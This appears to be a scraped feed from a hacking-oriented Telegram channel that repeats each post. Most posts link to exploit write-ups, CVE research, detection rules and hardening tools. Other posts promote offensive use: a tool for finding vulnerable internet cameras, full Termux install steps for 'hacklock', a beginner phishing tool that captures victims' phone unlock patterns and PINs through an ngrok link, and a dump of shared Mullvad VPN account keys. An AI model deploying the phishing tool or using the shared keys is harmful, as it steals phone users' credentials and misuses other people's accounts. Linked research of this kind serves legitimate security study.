Internet Camera Exploitation Tool
This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io
I was able to discover thousands of vulnerable cameras using it
Tool:- https://system32.ink/news-feed/p/179/
This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io
I was able to discover thousands of vulnerable cameras using it
Tool:- https://system32.ink/news-feed/p/179/
#Red_Team_Tactics
1. Elevation of Privilege from Local Admin to gMSA
https://aadinternals.com/post/local_admin_to_gmsa
2. Keeping LSA secrets out of physical memory
https://github.com/elastic/Silhouette
3. Basic SSTI - Server-Side Template Injection (2023)
https://infosecwriteups.com/basic-ssti-server-side-template-injection-2023-da4995583554
1. Elevation of Privilege from Local Admin to gMSA
https://aadinternals.com/post/local_admin_to_gmsa
2. Keeping LSA secrets out of physical memory
https://github.com/elastic/Silhouette
3. Basic SSTI - Server-Side Template Injection (2023)
https://infosecwriteups.com/basic-ssti-server-side-template-injection-2023-da4995583554
Phishing_CC_Guide.epub
12.3 MB
#Tech_book
"Phishing and Communication Channels: A Guide to Identifying and Mitigating Phishing Attacks", 2021.
"Phishing and Communication Channels: A Guide to Identifying and Mitigating Phishing Attacks", 2021.
#Malware_analysis
Detecting malicious artifacts using an ETW consumer in kernel mode
https://www.countercraftsec.com/blog/detecting-malicious-artifacts-using-an-etw-consumer-in-kernel-mode
Detecting malicious artifacts using an ETW consumer in kernel mode
https://www.countercraftsec.com/blog/detecting-malicious-artifacts-using-an-etw-consumer-in-kernel-mode
#hardening
A tool for checking the security hardening options of the Linux kernel
https://github.com/a13xp0p0v/kconfig-hardened-check
A tool for checking the security hardening options of the Linux kernel
https://github.com/a13xp0p0v/kconfig-hardened-check
#exploit
1. CVE-2022-37987:
A New Vector for Activation Context Cache Poisoning: Exploiting CSRSS for Privilege Escalation
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
2. A NETGEAR WAN Command Injection
https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection
3. Bypassing the Embedded Web Server's credential brute force prevention mechanism (PoC for CVE-2023-22960)
https://github.com/t3l3machus/CVE-2023-22960
// >60 Lexmark printer models
1. CVE-2022-37987:
A New Vector for Activation Context Cache Poisoning: Exploiting CSRSS for Privilege Escalation
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
2. A NETGEAR WAN Command Injection
https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection
3. Bypassing the Embedded Web Server's credential brute force prevention mechanism (PoC for CVE-2023-22960)
https://github.com/t3l3machus/CVE-2023-22960
// >60 Lexmark printer models
#OSINT
Detect Citrix Vulnerabilities With the OSINT Tool: CVE-2022-27510, CVE-2022-27518
https://blog.criminalip.io/2023/01/20/citrix-vulnerability
Detect Citrix Vulnerabilities With the OSINT Tool: CVE-2022-27510, CVE-2022-27518
https://blog.criminalip.io/2023/01/20/citrix-vulnerability
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰
Ⓜ️REQUIREMENTS :
Internet : 50 MB
php
Storage : 50 MB
ngrok Features :
[+] Real pattern hacking !
[+] Updated maintainence !
[+] Ngrok link
[+] Easy for Beginners !
INSTALLATION [Termux] :
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/hacklock
$ cd $HOME
$ ls
$ cd hacklock
$ ls
$ bash setup
$ bash hacklock.sh
[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...
[+]--You will recieve patter pin in below image you can see pattern with numbers
[+]--You can select any option by clicking on your keyboard
[+]--Note:- Don't delete any of the scripts included in core
〰〰〰〰〰〰〰〰〰〰〰〰〰
Ⓜ️REQUIREMENTS :
Internet : 50 MB
php
Storage : 50 MB
ngrok Features :
[+] Real pattern hacking !
[+] Updated maintainence !
[+] Ngrok link
[+] Easy for Beginners !
INSTALLATION [Termux] :
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/hacklock
$ cd $HOME
$ ls
$ cd hacklock
$ ls
$ bash setup
$ bash hacklock.sh
[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...
[+]--You will recieve patter pin in below image you can see pattern with numbers
[+]--You can select any option by clicking on your keyboard
[+]--Note:- Don't delete any of the scripts included in core
〰〰〰〰〰〰〰〰〰〰〰〰〰
👍1
Crips Tool is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.
Installation Commands
pkg update -y
pkg install git -y
pkg install python2 -y
git clone https://github.com/Manisso/Crips
cd Crips
python2 crips.py
Installation Commands
pkg update -y
pkg install git -y
pkg install python2 -y
git clone https://github.com/Manisso/Crips
cd Crips
python2 crips.py
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!
https://system32.ink/news-feed/p/181/
https://system32.ink/news-feed/p/181/
Mullvad VPN Key
All key valid for 14 days
Enjoy all 😂
7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 days
Enjoy all 😂
🍾3
Forwarded from ☠️Lèx Légîøn☠️
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
#GiveawayOnRepublicDay
TryHackMe 1 Month 3 Vouchers Giveaway...
If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe ID
We'll review your TryHackMe account and based on your progress we will try to ask some basic questions...
After that you will be given your TryHackMe Coupon...
Dm :- @lexlegion
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
#GiveawayOnRepublicDay
TryHackMe 1 Month 3 Vouchers Giveaway...
If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe ID
We'll review your TryHackMe account and based on your progress we will try to ask some basic questions...
After that you will be given your TryHackMe Coupon...
Dm :- @lexlegion
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
👍1
#Threat_Research
#Blue_Team_Techniques
1. At the Edge of Tier Zero: The Curious Case of the RODC
https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
2. Sigma Rule to Detect Uncommon Keyboard Layout Loads
https://gist.github.com/Neo23x0/62a75d4bbd26aa9164fa73384f6a1410
]-> Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
#Blue_Team_Techniques
1. At the Edge of Tier Zero: The Curious Case of the RODC
https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
2. Sigma Rule to Detect Uncommon Keyboard Layout Loads
https://gist.github.com/Neo23x0/62a75d4bbd26aa9164fa73384f6a1410
]-> Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
❤1
#Infographics
Linux Kernel Defence Map (v.5.13)
shows the relationships between vulnerability classes, exploitation techniques, bug detection mechanisms, and defence technologies
https://github.com/a13xp0p0v/linux-kernel-defence-map
Linux Kernel Defence Map (v.5.13)
shows the relationships between vulnerability classes, exploitation techniques, bug detection mechanisms, and defence technologies
https://github.com/a13xp0p0v/linux-kernel-defence-map
#exploit
1. CVE-2022-38181:
Vulnerability in the Arm Mali GPU
https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug
2. CVE-2023-0210:
Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow
1. CVE-2022-38181:
Vulnerability in the Arm Mali GPU
https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug
2. CVE-2023-0210:
Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow